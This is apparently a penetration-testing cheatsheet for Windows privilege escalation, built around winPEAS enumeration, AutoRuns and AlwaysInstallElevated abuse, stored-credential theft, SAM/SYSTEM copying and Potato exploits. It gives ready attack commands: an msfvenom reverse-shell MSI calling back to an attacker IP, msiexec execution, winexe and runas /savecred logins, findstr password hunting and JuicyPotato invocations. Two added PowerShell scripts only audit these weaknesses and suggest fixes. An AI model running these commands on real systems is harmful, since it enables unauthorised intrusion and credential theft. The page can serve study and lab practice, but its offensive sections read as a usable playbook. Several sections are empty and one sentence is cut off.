# Windows

1. Check the current user (`whoami`) and its group memberships (`net user \<username>`).
2. Run winPEAS with the `fast`, `searchfast`, and `cmd` options.
3. Run Seatbelt and other scripts as well (PowerUp.ps1, SharpUp, etc.).
4. If your scripts are failing and you don't know why, you can always run the manual commands from this source and from other Windows PrivEsc cheatsheets:

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation>" %}

Strategy:

Spend some time reading over the results of your enumeration.

If winPEAS or another tool finds something interesting, make a note of it.

Avoid rabbit holes by creating a checklist of the things you need for a privilege escalation method to work.

Have a quick look around for files on the user's desktop and in other common locations (e.g. `C:\` and `C:\Program Files`). Read through any interesting files you find, as they may contain information that helps escalate privileges.

{% hint style="info" %}
Have a good look at processes running as admin, enumerate their versions and search for exploits.

Check for internal ports that you might be able to forward to your attacking machine.

Try things that don't have many steps first:

* registry exploits, services, etc.
{% endhint %}

> If you still don't have an admin shell, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with, or even a username.
>
> At this stage you can also start to think about kernel exploits.

## Registry Exploits

| Requirements for success: |
| ------------------------- |
| <ul><li><p>AutoRuns --> <code>.\winPEASany.exe quiet applicationinfo</code></p><ul><li>search for <mark style="background-color:green;"><strong>Autorun Application (T1010)</strong></mark></li><li>check FilePerms: <strong>Everyone</strong></li><li>ability to <mark style="color:red;"><strong>restart</strong></mark></li></ul></li><li><p>AlwaysInstallElevated</p><ul><li><code>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</code> must be set to 1.</li><li><code>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</code> must be set to 1.</li></ul></li></ul> |

### AutoRuns

Replace Program.exe with reverseShell.exe, then restart the computer to get the application to run in the

Manual check:

```
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# check the directory permission

.\accesschk.exe /accepteula -wvu "<directory>"
```

### AlwaysInstallElevated

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.y LPORT=53 -f msi -o reverse.msi

# nc -lvnp 53
```

Execute the reverse shell (on the target, with the listener already running):

```
msiexec /quiet /qn /i reverse.msi
```
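The two registry checks above (writable AutoRun binaries and the AlwaysInstallElevated policy) can be audited in one pass. The script below is an added, read-only example written for this page; it is not from the original page or from winPEAS. It assumes Windows PowerShell 5.1 or later and reports findings without changing anything. The list of "broad" groups (Everyone, BUILTIN\Users, Authenticated Users) is a reviewer's assumption about which principals should never hold write access on an autorun.

```powershell
# Added audit example (not from the original page): reports the AutoRun and
# AlwaysInstallElevated weaknesses described above. Read-only; it never exploits.

$WriteMask = [int][System.Security.AccessControl.FileSystemRights]::Write
# Assumed set of broad groups whose write access on an autorun is a finding.
$BroadGroups = '^(Everyone|BUILTIN\\Users|NT AUTHORITY\\Authenticated Users)$'
# Note properties the registry provider attaches to every Get-ItemProperty result.
$ProviderProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Test-AlwaysInstallElevated {
    # The weakness is live only when BOTH the machine and the user policy value are 1.
    $paths = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
             'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($p in $paths) {
        $item = Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [pscustomobject]@{ Hive = $p.Split(':')[0]; Value = $item.AlwaysInstallElevated }
    }
    [pscustomobject]@{
        Check   = 'AlwaysInstallElevated'
        Finding = (@($values | Where-Object { $_.Value -eq 1 }).Count -eq 2)
        Detail  = ($values | ForEach-Object { "$($_.Hive)=$($_.Value)" }) -join ', '
    }
}

function Get-BroadWriteAccess {
    param([string]$Path)
    # Returns the broad identities holding any write bit on $Path.
    # Generic rights (GENERIC_WRITE) are not expanded here; accesschk does that.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference.Value -match $BroadGroups -and
            (([int]$_.FileSystemRights -band $WriteMask) -ne 0)
        } |
        ForEach-Object { $_.IdentityReference.Value } |
        Sort-Object -Unique
}

function Get-AutorunExePath {
    param([string]$Command)
    # Autorun values look like  "C:\Program Files\App\app.exe" /arg  or  C:\App\app.exe /arg
    # An unquoted path containing spaces is truncated at the first space and skipped later.
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($Command.Trim() -split '\s+')[0]
}

function Test-WritableAutoruns {
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($name in $props.PSObject.Properties.Name) {
            if ($name -in $ProviderProps) { continue }
            $exe = Get-AutorunExePath -Command ([string]$props.$name)
            if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
            # Check the binary and its folder: a writable folder lets the binary be
            # renamed and replaced even when the file ACL itself is tight.
            $fileWriters = @(Get-BroadWriteAccess -Path $exe)
            $dirWriters  = @(Get-BroadWriteAccess -Path (Split-Path -Path $exe -Parent))
            if ($fileWriters.Count -or $dirWriters.Count) {
                [pscustomobject]@{
                    Check   = 'Writable autorun'
                    Finding = $true
                    Detail  = "$key\$name -> $exe; file writable by [$($fileWriters -join ', ')]; folder writable by [$($dirWriters -join ', ')]"
                }
            }
        }
    }
}

# Run both checks and show the results.
@(Test-AlwaysInstallElevated) + @(Test-WritableAutoruns) | Format-List
```

A `Finding` of `$true` on either check is the condition the table above calls a requirement for success; the fix is to set both AlwaysInstallElevated values to 0 (or remove them) and to restrict write access on the autorun binary and its folder to administrators.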

## Service Exploits

| Requirements for success: |
| ------------------------- |
|                           |

## Passwords

| Requirements for success: |
| ------------------------- |
| `.\winPEASany.exe quiet filesinfo userinfo` -> search for <mark style="background-color:green;">**AutoLogon credentials (T1012)**</mark> |

Log in as another user on Windows (from the attacking machine):

```
winexe -U 'admin%password123' //<target ip address> cmd.exe

# nt authority
winexe -U 'admin%password123' --system //<target ip address> cmd.exe
```

### SaveCred

```
cmdkey /list

# exploit
runas /savecred /user:admin C:\Windows\Tasks\rev.exe
```
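The AutoLogon and SaveCred findings above can be checked from the host itself. The script below is an added example for this page, not code from the original page or from winPEAS: it reports whether a cleartext AutoLogon password is stored under the Winlogon key and parses `cmdkey /list` into objects, reporting presence only and never printing a secret. The sample `cmdkey` output is constructed, and the host and account names in it are hypothetical.

```powershell
# Added audit example (not from the original page): reports stored credentials
# that the Passwords section describes. Read-only; it never reveals the secret.

function Test-AutoLogonCredential {
    # Winlogon AutoLogon keeps the account name and, when configured without
    # LSA secrets, the password in cleartext under DefaultPassword.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Check           = 'AutoLogon'
        AutoAdminLogon  = [string]$p.AutoAdminLogon
        DefaultUserName = [string]$p.DefaultUserName
        DefaultDomain   = [string]$p.DefaultDomainName
        # Presence only; the value itself must never be echoed into logs.
        PasswordStored  = -not [string]::IsNullOrEmpty($p.DefaultPassword)
    }
}

function ConvertFrom-CmdkeyOutput {
    param([string[]]$Lines)
    # cmdkey /list prints one block per credential:
    #     Target: Domain:interactive=HOST\user
    #     Type: Domain Password
    #     User: HOST\user
    # Every entry listed here is usable with runas /savecred by the profile owner.
    $entries = @()
    $current = $null
    foreach ($line in $Lines) {
        if ($line -match '^\s*Target:\s*(.+)$') {
            if ($current) { $entries += $current }
            $current = [pscustomobject]@{
                Check  = 'SavedCredential'
                Target = $Matches[1].Trim()
                Type   = ''
                User   = ''
            }
        } elseif ($current -and $line -match '^\s*Type:\s*(.+)$') {
            $current.Type = $Matches[1].Trim()
        } elseif ($current -and $line -match '^\s*User:\s*(.+)$') {
            $current.User = $Matches[1].Trim()
        }
    }
    if ($current) { $entries += $current }
    $entries
}

function Get-SavedCredentialTargets {
    # Live run on the current user's credential store.
    ConvertFrom-CmdkeyOutput -Lines (cmdkey /list 2>$null)
}

# Constructed sample of cmdkey output (hypothetical host and accounts) to show the parser.
$sample = @'
Currently stored credentials:

    Target: Domain:interactive=WORKSTATION\admin
    Type: Domain Password
    User: WORKSTATION\admin

    Target: LegacyGeneric:target=TERMSRV/fileserver
    Type: Generic
    User: CORP\svc_backup
'@ -split "`r?`n"

"--- parsed sample ---"
ConvertFrom-CmdkeyOutput -Lines $sample | Format-Table -AutoSize

"--- live host ---"
Test-AutoLogonCredential | Format-List
Get-SavedCredentialTargets | Format-Table -AutoSize
```

On the constructed sample the parser yields two entries, one of type `Domain Password` for `WORKSTATION\admin` and one `Generic` entry for `CORP\svc_backup`. A `PasswordStored` of `$true` or any `Domain Password` entry in the live output is what winPEAS flags under T1012; the remediation is to remove the AutoLogon password and clear the saved credential with `cmdkey /delete`.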

### Password in Configuration

```
.\winPEASany.exe quiet cmd searchfast filesinfo
```

search for --> <mark style="background-color:green;">**possible known files that can contain creds(T1083\&T1081)**</mark>

or use these cmd commands to find credentials:

```
dir /s *pass* == *.config

findstr /si password *.xml *.ini *.txt
```

### SAM/SYSTEM Locations

File locations:

```
dir c:\windows\system32\config

dir c:\windows\repair

dir c:\windows\system32\config\regback
```

or use winPEAS:

```
.\winPEASany.exe quiet cmd searchfast filesinfo
```

search for --> <mark style="background-color:green;">**possible known files that can contain creds(T1083\&T1081)**</mark>

Copy the **SAM** and **SYSTEM** files to Kali Linux.

## Scheduled Tasks

| Requirements for success: |
| ------------------------- |
|                           |

## Insecure GUI Apps

| Requirements for success: |
| ------------------------- |
|                           |

## Startup Apps

| Requirements for success: |
| ------------------------- |
|                           |

## Installed Apps

| Requirements for success: |
| ------------------------- |
|                           |

## Hot Potato

| Requirements for success:                 |
| ----------------------------------------- |
| Windows 7, 8, 10, Server 2008, Server 2012 |

```
.\potato.exe -p 10.10.x.y -cmd "C:\Windows\Tasks\rev.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
```

<https://github.com/foxglovesec/Potato/tree/master/source/Potato/Potato/bin/Release>

## Juicy Potato

| Requirements for success: |
| ------------------------- |
| <ul><li>usually a service account</li><li><code>whoami /priv</code> -> <strong>SeImpersonatePrivilege</strong> <mark style="background-color:green;">Enabled</mark></li></ul> |

```
# -l <listen port>, -p <program to launch>, -t * (try both CreateProcessWithTokenW and CreateProcessAsUser), -c <CLSID>
.\JuicyPotato.exe -l 1337 -p C:\Windows\Tasks\rev.exe -t * -c <CLSID>
```

<https://github.com/ohpe/juicy-potato>

<https://jlajara.gitlab.io/Potatoes_Windows_Privesc>

{% hint style="info" %}
Make sure the CLSID is the right one. If stuck, check this out --> <https://www.youtube.com/watch?v=CW4mI5BkP9E&t=7090s>

{% endhint %}

## Port Forwarding

| Requirements for success: |
| ------------------------- |
|                           |

## Kernel Exploits

| Requirements for success: |
| ------------------------- |
|                           |

